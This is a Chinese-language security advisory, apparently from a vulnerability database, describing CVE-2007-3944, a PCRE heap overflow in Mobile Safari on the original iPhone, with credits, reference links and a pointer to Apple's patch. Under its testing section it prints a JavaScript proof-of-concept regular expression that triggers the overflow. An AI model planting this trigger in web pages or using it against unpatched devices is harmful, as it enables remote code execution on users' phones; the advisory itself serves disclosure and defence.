发布日期：2007-07-23
更新日期：2007-08-08

受影响系统：

Apple iPhone 1

不受影响系统：

Apple iPhone 1.0.1

描述：

---

BUGTRAQ  ID: 25002
CVE(CAN) ID: CVE-2007-3944

Apple iPhone是苹果最新推出的智能手机。

iPhone中所内嵌的Mobile Safari浏览器中的JavaScript引擎所使用的Perl键入正则表达式（PCRE）库中存在堆溢出漏洞，远程攻击者可能利用此漏洞控制用户机器。

如果用户使用该浏览器访问了恶意网页的话，就可以触发这个溢出，导致执行任意指令。

<*来源：Charlie Miller
        Jake Honoroff
  
  链接：http://www.securityevaluators.com/iphone/
        http://docs.info.apple.com/article.html?artnum=306172
        http://secunia.com/advisories/26235/
        http://www.securityevaluators.com/iphone/exploitingiphone.pdf
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<SCRIPT LANGUAGE="JavaScript"><!--
var re = new RegExp("[[**]][[**]][[**]][[**]][[**]][[**]][[**]][[**]]
[[**]][[**]][[**]][[**]][[**]][[**]][[**]][[**]][[**]][[**]][[**]][[**]]
[[**]][[**]][[**]][[**]][[**]][[**]][[**]][[**]][[**]][[**]][[**]][[**]]
[[**]][[**]][[**]][[**]][[**]][[**]][[**]][[**]][[**]][[**]][[**]][[**]]
[[**]][[**]][[**]][[**]][[**]][[**]][[**]][[**]][[**]][[**]][[**]][[**]]
[[**]][[**]][[**]][[**]][[**]][[**]][[**]][[**]][[**]][[**]][[**]][[**]]
[[**]][[**]]ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFG[\x01\x02\x03\x04\x05\x06\x07
\x09\x0b\x0e\x0f\x11\x12\x13\x14\x15\x17\x19\x1b\x1c\x1d\x1f\x20\x21\x22
\x23\x25\x26\x27\x29\x2a\x2b\x2c\x2d\x2f\x30\x32\x33\x35\x37\x39\x3a\x3b
\x3c\x3e\x3f]XYZABCDEFGHIJKLMNOPQR");
</script>

建议：

---

厂商补丁：

Apple
-----
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.apple.com/safari/download/

浏览次数：2414
严重程度：0（网友投票）